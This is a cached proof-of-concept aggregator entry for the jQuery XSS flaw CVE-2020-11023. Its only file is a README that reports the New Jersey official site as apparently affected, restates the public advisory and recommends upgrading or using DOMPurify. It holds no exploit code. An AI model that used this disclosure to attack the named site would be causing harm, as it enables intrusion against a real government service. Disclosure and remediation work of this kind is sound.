CVE-2020-11023 PoC — jQuery 跨站脚本漏洞

Source

https://github.com/Snorlyd/https-nj.gov---CVE-2020-11023

Associated Vulnerability

Title:jQuery 跨站脚本漏洞 (CVE-2020-11023)
Description:jQuery是美国John Resig个人开发者的一套开源、跨浏览器的JavaScript库。该库简化了HTML与JavaScript之间的操作，并具有模块化、插件扩展等特点。 jQuery 1.0.3版本至3.5.0之前版本中存在跨站脚本漏洞。该漏洞源于WEB应用缺少对客户端数据的正确验证。攻击者可利用该漏洞执行客户端代码。

Description

Vulnearability Report of the New Jersey official site

Readme

# https-nj.gov---CVE-2020-11023
#### Vulnearability Report of the New Jersey official site
Potential XSS vulnerability when appending HTML containing option elements.

Passing HTML containing `<option>` elements from untrusted sources - even after sanitizing them - to one of jQuery's DOM manipulation methods (i.e. `.html()`, `.append()`, and others) may execute untrusted code.

# RECOMMENDATION
This problem is patched in jQuery 3.5.0; Therefore, it would only be necessary to update it.
To fix this bug without updating it, we can use [DOMPurify](https://github.com/cure53/DOMPurify) with its `SAFE_FOR_JQUERY` option to sanitize the HTML string before passing it to a jQuery method.

At least jQuery 1.12/2.2 or later is required to apply this workaround.

# REFERENCES
https://blog.jquery.com/2020/04/10/jquery-3-5-0-released/
#### For more information
If you have any questions or comments about this advisory, search for a relevant issue in the [jQuery repo](https://github.com/jquery/jquery/issues). If you don't find an answer, open a new issue.

File Snapshot


 [4.0K]  /data/pocs/236a73a2f1f3555f6f1896b4715eae34f27a3e8f
└── [1.0K]  README.md

0 directories, 1 file

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!